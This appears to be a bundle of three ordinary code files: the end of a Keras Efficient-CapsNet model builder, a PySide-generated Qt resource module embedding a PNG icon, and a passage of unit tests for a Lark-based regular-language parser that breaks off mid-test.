    x = tf.keras.layers.Conv2D(16, 3, kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #76,52
    x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #152,104
    x = tf.keras.layers.Conv2D(32, (3,5), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #150 100
    #x = tf.keras.layers.Conv2D(32, (4,3), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x) #153 103
    #x = tf.keras.layers.UpSampling2D(size=(2,2), interpolation='bilinear')(x) #306, 206
    #x = tf.keras.layers.Conv2D(16, (4,4), kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.leaky_relu)(x)
    x = tf.keras.layers.Conv2D(1, 1, kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01),activity_regularizer=regularizers.l2(0.01),padding="valid", activation=tf.nn.sigmoid)(x) #150,100
    return tf.keras.Model(inputs=inputs, outputs=x, name='Generator')
def build_graph(input_shape, mode, verbose):
    """
    Efficient-CapsNet graph architecture with reconstruction regularizer.
    The network can be initialized with different modalities.

    Parameters
    ----------
    input_shape: list
        network input shape
    mode: str
        working mode ('train', 'test' & 'play')
    verbose: bool
    """
    inputs = tf.keras.Input(input_shape)
    y_true = tf.keras.layers.Input(shape=(2,))
    noise = tf.keras.layers.Input(shape=(2, 16))

    efficient_capsnet = efficient_capsnet_graph(input_shape)

    if verbose:
        efficient_capsnet.summary()
        print("\n\n")

    digit_caps, digit_caps_len = efficient_capsnet(inputs)

    noised_digitcaps = tf.keras.layers.Add()([digit_caps, noise])  # only if mode is play

    masked_by_y = Mask()([digit_caps, y_true])
    masked = Mask()(digit_caps)
    masked_noised_y = Mask()([noised_digitcaps, y_true])

    generator = generator_graph(input_shape)

    if verbose:
        generator.summary()
        print("\n\n")

    x_gen_train = generator(masked_by_y)
    x_gen_eval = generator(masked)
    x_gen_play = generator(masked_noised_y)

    if mode == 'train':
        return tf.keras.models.Model([inputs, y_true], [digit_caps_len, x_gen_train], name='Efficinet_CapsNet_Generator')
    elif mode == 'test':
        return tf.keras.models.Model(inputs, [digit_caps_len, x_gen_eval], name='Efficinet_CapsNet_Generator')
    elif mode == 'play':
        return tf.keras.models.Model([inputs, y_true, noise], [digit_caps_len, x_gen_play], name='Efficinet_CapsNet_Generator')
    else:
        raise RuntimeError('mode not recognized')
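
A hedged usage sketch, not part of the original file. The (150, 100, 1) input
shape below is inferred from the layer arithmetic rather than stated in the
file: the convolution stack reduces 150x100 to the 14x10 grid that
PrimaryCaps(128, (14,10), 16, 8) expects, and the generator upsamples back to
150x100, matching the inline shape comments.

# Sketch only: the input shape is an inference, not a value from the source repo
if __name__ == '__main__':
    model = build_graph(input_shape=(150, 100, 1), mode='test', verbose=False)
    model.summary()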

File: mapclientplugins/scaffoldgroupmanagerstep/resources_rc.py (Python, 7,826 bytes, Apache-2.0 license)
Repo: rchristie/mapclientplugins.scaffoldgroupmanagerstep @ 50661cf2f20eee35552b3e2d5c51ee8c28593ada

# -*- coding: utf-8 -*-
# Resource object code
#
# Created: Sun 3. May 12:51:01 2020
# by: The Resource Compiler for PySide (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
qt_resource_data = b"\x00\x00\x09*\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x00@\x00\x00\x00@\x08\x06\x00\x00\x00\xaaiq\xde\x00\x00\x00\x04sBIT\x08\x08\x08\x08|\x08d\x88\x00\x00\x00\x09pHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00\x19tEXtSoftware\x00Adobe ImageReadyq\xc9e<\x00\x00\x08\xa7IDATx\x9c\xed\x9bklS\xe7\x1d\xc6\x7f\xc7\xb9\xf8\x18\xdb`Z\x8a\xed\x84r\x89\xe3\xa0\x05\xca%\xe9\x87i\xe9h\xaa\xa47\x1a\xa9Z\xbb\xb5l\x9a&\xba\x16Z\xa0%)\x97$\xa3\xa1\x8e\x09\x04\x1c\xae\x81\xde\x96U[7\xa6m\x9d\xa6\xb5\xd3\x02\x09\x04\x0a[\x99T\xa6\x850\x822\xd5I\x9c\x94R\xdb\xa1\x8c8\xb1\x1d\x1f\xe7\xe2\xb3\x0f\xb9\x0c(U\xab8\xbe\x00\xfd}\xb1\xf4\x9e\xf7\xe8\xff<\xcf{\xcey\xcf9>\xaf\xc0\x0d\xb0X,:I\x92\x8a\x80\xc7\x05AXt\xa3>7\x0b\xb2,\x9f\x05\xfe\x02\xbcc\xb3\xd9:\xaf\xdf.\x5c\xdfPRRR\x0e\x14\xdeq\xc7\x1d\xba\xcc\xccL233\x01HKK\x8b\xac\xd2\x09\xc6\xe1p\x00\xd0\xd2\xd2BKK\x0bW\xae\x5c\xf1\x00\xd56\x9b\xad\xfc\xea~c\x01X,\x16]0\x18\xdc\x0b,\xcf\xcf\xcf'///\x9az#\xce\xf1\xe3\xc79v\xec\x18\xc0;J\xa5\xf2e\xab\xd5\xea\x01H\x1c\xed\x10\x0c\x06\xf7\x8a\xa2\xb8|\xe5\xca\x95\x18\x8d\xc6X\xe9\x8c\x18yyydffRSS\xb3\x5c\x92$\x80g\x00\x12\x00JKK\x8b\x80\xd2\xd5\xabW\xdf\x92\xe6G\xd1j\xb5\xcc\x9d;\x97\xd3\xa7O/\xba\xef\xbe\xfbzN\x9d:\xf5Q\x82\xc5b\xd1\x0d\x0e\x0e\xbe\xf7\xe0\x83\x0f\x8a\x0b\x16,\x88\xb5\xc6\x88\xa3\xd5j\x11\x04\x81\xf6\xf6\xf6o\xe7\xe7\xe7\xff\x5c\x11\x0c\x06\x97\xabT*]NNN\xac\xb5E\x8d\x9c\x9c\x1cT*\x95.\x18\x0c.W\x00\x8f\xcf\x9b7\x0fQ\x14c\xad+j\x88\xa2\xc8\xbcy\xf3\x00\x1eW\x00\xb9\xa3S\xdd\xed\xc4\x88\xe7\x5c\x05p[\x8d\xfe(\xa3\x9e\x15\x00)))1\x15\x13\x0bF=\x7fs\x04\xc4XG\xccI\xfc\xea.\xb1A\xee\xf31t\xc1\xce\xc0\x7f\x9aH\x9ci&a\x96\x19\xc5\xb4\x89\xbfI\x8b\xbb\x00B\x9f\xbb\x08\xbc\xf76\xc1\x0f\x0f\x7fa\x9b\xf8\xf0\xd3L\xfaq\xd1\x84\xd6\x8b\xab\x00\x06;\xed\xf4T\xac\x82>\x1f\xca\xfb\x0bH\xbew\x09\x00\xde7\xb7@\x9f\x8f\x90\xcf;\xe15\xe3&\x80\xc1N;\x1e\xeb\xf3\x80\xc0\x94\xcdo\x90\x94\x99\x8d\xec\xf7\xe2\xb1>O\xc8\xdb\x8b\x98[\x80\xe6\x85\xcd\x13^7n\x02\xe8}\xcd\x8a\x1c\x12\x98j}\x8b\xc4\xd9\x19\xc8~/\xdd\x96\x17\x18\xeclE|\xa0\x00\xedjKD\xea\xc6\xc5,\x10\xfc\xe7\xdf\x18\xe8hE\xb5t\x19\x89\xb33\x00\xb8bY\xc5@G+bn\x01\x93\xd7D\xc6<\xc4I\x00\xfd\xe7\xcf \xcb\x02\x93\x0a~8\xd6&L\xd2\x22\xa8&3\xf9\xc5/7\xdfs\xa0\x82\x9e\x03\x15a\xd5\x8e\x8f\x00:\xec$\xce\xce@\xa1\xd6\x8e\xb5%ef1\xe4\xf72t\xc9u\xc3}<\xfb+\xe8\xfb\xa0\x96\xbe\x0fj\xbf\xb4\xcf\xd7!.\x02 $ \xa8\xb4\xd74%\xcf\xcfF\x0e\x09\x04\x9b\xcf|\xa1\xbbg\x7f\x05}\xc7\x0f!\xa8&#\x87\x04\x06\x1c\xf6q\x97\x8e\x8b\x00\x14\xd3S\x90\x9a\x9b\xaeiS\xce\xcfB\x98\xa4\xc5\xf7\xd7w\xf1\x1f?\xc4\xe0\xc8(wWo\xc5\x7f\xec0\x89s2\xd0\xad\xdd\x8c,\x0b\xf4w\xb4\x8e\xbfvX\xca'\x88\xe4\xf9\x8b\x91e\x01\xff\xf1C\xd7\xb4\xab\xf2\x0a\x18t\xbb\xe9\xde\xb7\x0d\xf7\xb3O\xe2\x5c\xf6\xd0\x98\xf9i\xdb\xde@\x06dY@9?k\xdc\xb5\xe3b\x1a\x0c\xf9|\xc8\xb2@\xb0\xf9,\xea\xbc\xc7\xc6\xdau\xcf\x15\xa2{\xae\x90`\xf3\x19\xa4\xe6&\x82\xcdM\x84\xfc^\xee\xaa|\x1d\x85ZC\xdfG\x1f\x22\xcb\x02Ii\x19\xe3\xae\x1d\xf3\x00|\xc7\x0e\xd3]s\x80\xe443\xba\x15\x857\xec\xa3\xbc'\x0b\xe5=\xd7\x8e\xb2\xd4\xdc\x84\xbf\xa1\x0eu\xfeR\x14j\xcd\xb8\xeb\xc7\xf4\x14\xf05\xd4\xf1\xdf=\x95$\xcd13}\xc7k\x84|\xbe\xaf\xb5_\xbf\xa3\x95K\xd6\x9f!L\xd20\xe5G?\x0dKC\xcc\x02\xf05\xd4qyO%Is2\xd0\xdb\x0e0\xe8v\xe1.y\x89\xc1.7!\x9f\x8f\xcfwW\xe2k\xa8\xbbf\x9f\x90\xcfG\xf7o\x7f\x89\xabx- \xa0\xb7\x1d 
Q\x1f\xde\x13bLN\x01\xef\xd1:.\xef\xdeN\xb2)\x03\x83\xad\x9aA\xb7\x8b.\xeb+\xe8-\x95(\xd4\x1a\x9c\xc5\x85\x0c\xb4\xb7\xe2;Z\xcf\xe7\xbb\xb6#.X\xcc\x90\xdf\xc7@\xfb\xf0\xd5>\xd9d\xe6\xae\xf5\xa5$\xa7\x99\xc3\xd6\x12\xf5\x00\xbcG\xeb\xb8\xb4k\x07J\x93\x19cU5\x03]n\xdc\xe5e\x18\xcb\xb7\x91\xa87\xe2\xdcXH\xb0\xbd\x8di\xab^B\xa1\xd6\x108\xf7o\x06\xbb\x5c(\xd4\x1a\xb4\xdf{\x0a\xd5\x82\x85\xa8\xbf\xf3\xdd\x09\xd3\x13\xd5\x00z\x8f\xd6si\xa7\x0d\xa5)\x9d\x94\x9d#\xe6-e\x18\xac\xdbH\xd4\x1b\xf8lC\x11\xc1\xf6v\xf4\x1bK\xd1>\xf4(\xc0\xd8o\xa4\x88\xda5\xa0\xf7H=]U;HNK'u\xd7\xb0y\x97\xa5\x0c\x83u+Iz\x03\x17\xd7\x17!\xb5\xb51}Ci\xc4M_MT\x02\xe8=R\x8f\xbb\xcaF\xb2\xc9\xcc\x8c\xdd\xfb\x18p\xbbq\xbe\xba\x19c\xf9\xb0\xf9O\xd7\xbf\x8c\xd46<\xf2\x93\x1f~$\x1a\x92\xc6\x88x\x00=\xf5\xf5\xb8lU$\x9b\xcc\xdc\xbd{/\x03n7\x9f\xbd\xfa*)\xd6\x0a\x92\x0c\x06.\xac[\x87\xd4\xda\x8eacI\xd4\xcdC\x84\x03\xe8\xa9?\x82\xcb\xb6\x13\xa5\xc9\xcc\xcc={\xe8w\xbb\xb9\xb8\xd9B\xea\x96-$\x1a\x0c\x5cxy\xfd\xb0\xf9\xe2\x12&?\x12}\xf3\x10\xc1\x00z\xea\x8f\xe0\xdcQ\x85\xd2\x94\xce\xdd{w\xd3\xef\xee\xe2b\x99\x85\xd4\x0a\xeb\xb0\xf9\xa2\xf5\x04Z\xdb0\x96\x143\xe5\x91\x87#%\xe3+\x89\xc8,\xe0\xa9;\x82k\xc7N\xc4\xf4tf\xee\xdb\xcd\x80k\xd8\xfc\x8cm[H2\xe8\xf9\xa4p=\xc1\xb6vRJck\x1e\x22p\x04x\xea\x8e\xe2\xdc\xbe\x0bez:3\xab\x87\xcd\x7f\xfa\x8a\x85\x19[\xad$\x19\xf4t\xae\xdd\x80\xd4\xea\xc0XZ\xcc\x94Gck\x1e&\xe8\x08\x18\xf2\xf9\xf07\x9d\xc3\x7f\xf6\x1cW\xfe\xf8gD\xb3\x89Y\xd5\xbb\x18puqaS93+\xad$\x19\xf5t\xac\xddH\xb0\xd5A\xea\xa6\x8d\xe8\x1e}h\x22J\x87M\xd8\x01t\x1f>\x8a\xbb\xfaM\x86\xfc~\x00D\xb3\x89\xd9\xfbw^e\xbe|\xd8\xfc\x8b\x1b\x90\xda\x1c\xa4n\xda\x107\xe6!\xcc\x00z\xff\xfe\x0f>\xdbZ\x85h6\x91\xfa\xecOPg-$A3\xf2hj\xe4\xff\xe6\xd7\x0c_\xedS\xcb62ui\xfc\x98\x870\x03p\xed{\x9d$\xc3t\x8c\x85\xab\xb8\xb8\xb5\x0a\x85F\xc3\x80\xcb\xcd,\xdb\x16\xd4Y\x8b\xc0\x00\x8e\xd5\xeb\x90Z\xdb\x98QV\xcc\xd4\xa5\xb1?\xe7\xafg\xdc\x17A\xc9\xdeF\xbf\xd3\xc9\x9dO=\xc1\xe5w\xff\xc4\x9dO=\x81\xf975\xa4\xbd\xbe\x87OJ\xca\x00p\xac)B\xb2\xdb\x87\xcd?\x16\x9by\xfe\xab\x18w\x00C>/\xc8!T\x19&\xfc\x8dg\x98\xb6\xec\xfb\x00\x88\x19\xe9$\xe9\xf5\x0cy}H\x1f\xdb\x99\xf6\xf4\x93qk\x1e\xc2\x08@\xa1\xd1 \x87B\xf8\xfe\xd5\xc4\xa4\xc5\x0bq\xee\xd9\x0f@w\xeda\x86z{\xf176!\x87B\xa8\x17\xc7\xf7\xa7\xc6\xe3\x0e@\x95a&\xd9h\xe0\xf2\xef\xff\xc0\xb4e?\xa0\xdf\xe9\xe2\xdc\xbd9\xf4\x9c\xfc\x90\x19\x96Mt\xd5\xbcM\x82F\x8d:{\xf1D\xea\x9dp\xc2\xba\x11\x9a\xb5s;C\xbd^>YW\x82\xcal\x22\xed\xad\x03\xa8\xb3\x16r\xd1\xb2\x85\xc0\xc7vR\xd6\xad%A;\xfe\x17\x96\xd1 \xacY@5\xd7\x8c\xf9w\xbf\xa6s]1\xee\xb7~1\xd6\x9e\x9cbd\xd6\xae\x1dLy\xe0\xfe\xb0\x05F\x9a\xb0o\x84Ts3\xf8\xd6\xa1\xf7\x09|lg\xc8\xeb%A\xabE5w\xfc\xef\xe9\xa3\xcd\x84=\x0c\xddL\xa6\xaf&.\xfe\x1a\x8b%\xdf\x04\x10k\x01\xb1\xe6\x9b\x00\x00\x5c\xae\xf1\x7faq\xb32\xba\xa8J\x01\x10\x08\x04b*&\x96(T*\x95\xe7v<\x02F<w*\x12\x12\x12N666\xc6ZO\xd4\x19\xf1|R\xa1\xd7\xeb\xab].\xd7\xd89q;\xe0p8p\xb9\x5c(\x14\x8aj\xc5\x8a\x15+N\xaaT\xaa\x93\x07\x0f\x1edd=\xdd-\x8d$I\x1c<x\x10Y\x96\xdf\xaf\xac\xac<\xab\x00X\xb2d\xc93\xa2(zjjjn\xe9\x10$I\xa2\xa6\xa6\x86@ pV\x14\xc5g\xe0\xaa\xa5\xb3\xe7\xcf\x9f_T[[{B\x92$]AA\x01\xd9\xd9\xd9\xb1S\x1a\x01\x1a\x1b\x1b\xa9\xad\xad\x1d5\xff\xc0\xe8\xd2\xd9k\x16O\x9f8qb\xb6\xddn\xffUGGG\xee\xd4\xa9S\xc9\xce\xcef\xce\x9c9\xc0\xcd\xb5xZ\x92$\x9cN'\x00\x1d\x1d\x1d466\xd2\xdd\xdd\x8d,\xcb\xfbDQ\xb4\x8e\x9a\x87\x1b\xac\x1e\x07hhh\xc8mii)\xf4x<\xb9\x81@@\x17%\xdd\x91\xa2S\x96\xe5\xf7\x19^9\xdey\xfd\xc6\xff\x01\x83\xf4L\xe7_n_\x13\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = b"\x00\x18\x01Oa`\x00s\x00c\x00a\x00f\x00f\x00o\x00l\x00d\x00g\x00r\x00o\x00u\x00p\x00m\x00a\x00n\x00a\x00g\x00e\x00r\x00s\x00t\x00e\x00p\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x0b\x00E7'\x00u\x00t\x00i\x00l\x00i\x00t\x00y\x00.\x00p\x00n\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x006\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00H\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
def qInitResources():
    QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)


def qCleanupResources():
    QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)


qInitResources()
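
A brief usage sketch, not part of the generated file: importing this module
registers the embedded PNG with Qt's resource system. The resource path below
is inferred from the entries visible in qt_resource_name and is an assumption.

# Hypothetical usage; the resource path is inferred from qt_resource_name above
from PySide import QtGui

import mapclientplugins.scaffoldgroupmanagerstep.resources_rc  # registers resources on import

# Requires a QApplication to have been constructed first
pixmap = QtGui.QPixmap(':/scaffoldgroupmanagerstep/images/utility.png')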

File: regular_language/unit_tests/test_lark_parser.py (Python, 91,181 bytes, MIT license)
Repo: ShoYamanishi/nlpregex @ 795b36d5a2fad8bc25264b2093ffa9c3723b282b

#!/usr/bin/env python
# -*- coding: utf-8 -*-

""" Unit Tests for lark_parser.py."""

import unittest

import nlpregex.regular_language.lark_parser
from nlpregex.regular_language.fa import DFA_from_NFA


class test_lark_parser( unittest.TestCase ):

    def __init__( self, *args, **kwargs ):
        unittest.TestCase.__init__(self, *args, **kwargs)
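    # Each test parses a rule of the form '<nonterminal> : body ;' with
    # LarkParser, pretty-prints the resulting AST via emit_formatted_text(),
    # and builds an FST from it; the commented-out draw() calls can render the
    # NFA/DFA for inspection. A bracketed group such as '[token01 token02]'
    # attaches output tokens to the preceding symbol.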
def test_0001(self):
spec01 = ''
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
self.assertEqual( len(ASTs), 0 )
def test_0002(self):
spec01 = '<nt01>:t02;'
spec_expected = 't02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0002b(self):
spec01 = '<nt01>:t02 [token01 token02];'
spec_expected = 't02 [ token01 token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0003(self):
spec01 = '<nt01>:t02;'
spec_expected = 't02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0004(self):
spec01 = '<nt01>:t02 t03;'
spec_expected = 't02 t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0004b(self):
spec01 = '<nt01>:t02 [token01 token02] t03;'
spec_expected = 't02 [ token01 token02 ] t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0004c(self):
spec01 = '<nt01>:t02 t03[token01 token02];'
spec_expected = 't02 t03 [ token01 token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0004d(self):
spec01 = '<nt01>:t02 [token01 token02] t03 [token03 token04];'
spec_expected = 't02 [ token01 token02 ] t03 [ token03 token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0005(self):
spec01 = '<nt01>:<nt02>;'
spec_expected = '<nt02>'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0005a(self):
spec01 = '<nt01>:<nt02> [token01];'
spec_expected = '<nt02> [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006(self):
spec01 = '<nt01>:<nt02> <nt03>;'
spec_expected = '<nt02> <nt03>'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006b(self):
spec01 = '<nt01>:<nt02> [token01]<nt03>;'
spec_expected = '<nt02> [ token01 ] <nt03>'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006c(self):
spec01 = '<nt01>:<nt02> <nt03>[token01];'
spec_expected = '<nt02> <nt03> [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006d(self):
spec01 = '<nt01>:<nt02> [token01]<nt03>[token02];'
spec_expected = '<nt02> [ token01 ] <nt03> [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006e(self):
spec01 = '<nt01>:(<nt02> <nt03>)[token02];'
spec_expected = '( <nt02> <nt03> ) [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006f(self):
spec01 = '<nt01>:(<nt02> [token01]<nt03>[token02])[token03];'
spec_expected = '( <nt02> [ token01 ] <nt03> [ token02 ] ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008(self):
spec01 = '<nt01>:( <nt02> | <nt03> );'
spec_expected = '( <nt02> | <nt03> )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008b(self):
spec01 = '<nt01>:( <nt02>[token01] | <nt03> );'
spec_expected = '( <nt02> [ token01 ] | <nt03> )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008c(self):
spec01 = '<nt01>:( <nt02> | <nt03> [token01]);'
spec_expected = '( <nt02> | <nt03> [ token01 ] )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008d(self):
spec01 = '<nt01>:( <nt02> [token01]| <nt03> [token02]);'
spec_expected = '( <nt02> [ token01 ] | <nt03> [ token02 ] )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
